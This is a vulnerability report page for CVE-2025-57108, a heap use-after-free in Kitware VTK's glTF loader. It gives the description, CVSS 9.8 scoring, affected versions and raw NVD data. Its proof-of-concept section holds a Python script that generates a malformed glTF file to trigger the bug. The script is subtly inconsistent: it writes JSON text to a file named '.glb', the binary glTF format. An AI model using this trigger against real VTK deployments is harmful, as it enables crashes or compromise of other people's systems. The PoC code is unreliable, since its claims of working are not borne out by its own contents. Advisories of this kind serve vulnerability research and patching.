Security Vulnerability Report
CVE-2025-57108 CVSS 9.8 CRITICAL

CVE-2025-57108

Published: 2025-10-31 15:15:43
Last Modified: 2025-11-05 19:37:50

Description

Kitware VTK (Visualization Toolkit) through 9.5.0 contains a heap use-after-free vulnerability in vtkGLTFDocumentLoader. The vulnerability manifests during mesh object copy operations where vector members are accessed after the underlying memory has been freed, specifically when handling GLTF files with corrupted or invalid mesh reference structures.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vtk:vtk:*:*:*:*:*:*:*:* - VULNERABLE
Kitware VTK < 9.5.1
Kitware VTK 9.5.0 and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-57108 PoC - Malicious GLTF file generator
Kitware VTK vtkGLTFDocumentLoader Heap Use-After-Free
"""
import json
import struct
import os


def create_malicious_gltf():
    """
    Generate a malicious GLTF file that triggers use-after-free
    in vtkGLTFDocumentLoader during mesh copy operations.
    """
    # Malicious GLTF content with invalid mesh references
    gltf_data = {
        "asset": {"version": "2.0"},
        "scene": 0,
        "scenes": [{"nodes": [0]}],
        "nodes": [{"mesh": 0}],
        "meshes": [{
            "name": "malicious_mesh",
            "primitives": [
                {
                    "attributes": {
                        "POSITION": 0},
                    "indices": 1,  # Invalid accessor reference triggers vulnerability
                    "material": 999999999  # Invalid reference
                }
            ]
        }],
        "accessors": [
            {
                "bufferView": 0,
                "componentType": 5126,
                "count": 3,
                "type": "VEC3",
                "max": [1.0, 1.0, 1.0],
                "min": [-1.0, -1.0, -1.0]
            },
            {
                "bufferView": 1,
                "componentType": 5123,
                "count": 6,
                "type": "SCALAR"
            }
        ],
        "bufferViews": [
            {"buffer": 0, "byteOffset": 0, "byteLength": 36},
            {"buffer": 0, "byteOffset": 36, "byteLength": 12}
        ],
        "buffers": [
            {"byteLength": 48, "uri": "data:application/octet-stream;base64,AAAAAAAAAAAAAAAAAAAAACAAAAAAACAAAAAAACAAAAAAACAAAAAAACAAAAAAACAAAAA=="}
        ]
    }

    # Write malicious GLTF file
    output_path = "malicious_cube.glb"
    with open(output_path, 'w') as f:
        json.dump(gltf_data, f)

    print(f"[+] Created malicious GLTF file: {output_path}")
    print(f"[+] File triggers use-after-free in vtkGLTFDocumentLoader")
    return output_path


if __name__ == "__main__":
    create_malicious_gltf()

References

https://gitlab.kitware.com/vtk/vtk/-/issues/19736 (Exploit, Issue Tracking, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57108", "sourceIdentifier": "[email protected]", "published": "2025-10-31T15:15:42.550", "lastModified": "2025-11-05T19:37:49.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kitware VTK (Visualization Toolkit) through 9.5.0 contains a heap use-after-free vulnerability in vtkGLTFDocumentLoader. The vulnerability manifests during mesh object copy operations where vector members are accessed after the underlying memory has been freed, specifically when handling GLTF files with corrupted or invalid mesh reference structures."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vtk:vtk:*:*:*:*:*:*:*:*", "versionEndIncluding": "9.5.0", "matchCriteriaId": "4FACF42A-92AA-4011-9219-A8F328C6FF63"}]}]}], "references": [{"url": "https://gitlab.kitware.com/vtk/vtk/-/issues/19736", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}